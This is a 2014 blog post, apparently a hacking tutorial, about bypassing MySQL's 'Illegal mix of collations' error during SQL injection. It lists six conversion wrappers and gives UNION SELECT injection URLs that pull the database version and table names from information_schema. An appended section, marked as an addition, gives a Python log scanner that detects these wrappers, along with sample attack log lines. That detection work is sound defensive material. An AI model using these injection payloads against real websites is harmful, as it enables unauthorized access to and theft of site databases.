Tuesday, 24 June 2014

SQLi - Bypass "Illegal mix of collations" Error




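In this post, I'm not going to explain SQL injection from the beginning; I'm just going to show how to bypass the "Illegal mix of collations" error that can occur while you are injecting a site. MySQL raises this error when the injected value and the column it is combined with have incompatible collations. The error can be bypassed by wrapping the injected expression in one of these strings, each of which converts the value to another character set or to a binary string: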

1- convert(x() using latin1)

2- aes_decrypt(aes_encrypt(x(),1),1)

3- unhex(hex(@@x))

4- cast(x()+as+binary)

5- convert(x(),binary)

6- convert(x()+using+binary) 

*Note: x = the SQL expression, such as version / database / group_concat(table_name) / etc. A `+` in these strings is a URL-encoded space.

For example, I'm going to find the MySQL version, but it gives an error when I use:

http://www.site.com/index.php?id=null union all select 1,2,@@version,4,5--

So, to bypass this, I will use one of those strings:

http://www.site.com/index.php?id=null union all select 1,2,convert(@@version using latin1),4,5--

If I want to get the table names, this is the query that I should use:

http://www.site.com/index.php?id=null union all select 1,2,convert(group_concat(table_name)using latin1),4,5 from information_schema.tables where table_schema=database()--
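
From the defender's side, the wrappers listed above are distinctive in web server logs, because ordinary requests rarely carry SQL conversion functions in a parameter. The following is an added example, not part of the original post: a small scanner that URL-decodes each request and flags the wrapper forms from the list. The log lines, paths, function names and severity labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Wrapper forms listed in the post, matched after URL-decoding and lowercasing.
WRAPPERS = {
    "convert_using": re.compile(r"\bconvert\s*\([^;]*?\busing\s+\w+\s*\)"),
    "convert_binary": re.compile(r"\bconvert\s*\([^;]*?,\s*binary\s*\)"),
    "cast_as_binary": re.compile(r"\bcast\s*\([^;]*?\bas\s+binary\s*\)"),
    "aes_roundtrip": re.compile(r"\baes_decrypt\s*\(\s*aes_encrypt\s*\("),
    "unhex_hex": re.compile(r"\bunhex\s*\(\s*hex\s*\("),
}
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (severity, wrapper_names) for one access-log line, else (None, [])."""
    m = REQUEST.search(line)
    if not m or "?" not in m.group(1):
        return None, []
    # unquote_plus turns both '+' and %20 into spaces, as the server would.
    query = unquote_plus(m.group(1).split("?", 1)[1]).lower()
    hits = sorted(name for name, rx in WRAPPERS.items() if rx.search(query))
    if not hits:
        return None, []
    # A wrapper next to UNION SELECT matches the post's pattern: high severity.
    return ("high" if UNION_SELECT.search(query) else "medium"), hits

def scan_log(lines):
    """Return [(line_number, severity, wrapper_names)] for flagged lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        severity, hits = scan_line(line)
        if severity:
            findings.append((n, severity, hits))
    return findings

# Constructed sample lines (documentation IP range, hypothetical paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jun/2014:10:01:02 +0000] "GET /index.php?id=null+union+all+select+1,2,convert(@@version+using+latin1),4,5-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Jun/2014:10:01:09 +0000] "GET /index.php?id=null%20union%20all%20select%201,2,unhex(hex(@@version)),4,5-- HTTP/1.1" 200 498',
    '198.51.100.4 - - [24/Jun/2014:10:02:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [24/Jun/2014:10:02:30 +0000] "GET /search.php?q=convert+pdf+using+binary+tools HTTP/1.1" 200 1710',
    '192.0.2.55 - - [24/Jun/2014:10:03:11 +0000] "GET /report.php?expr=cast(total+as+binary) HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The fourth sample line contains the words "convert", "using" and "binary" without a function call and is not flagged, which shows why the patterns anchor on the opening parenthesis.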


Alright, I guess that's all. Watch this video if you still can't understand.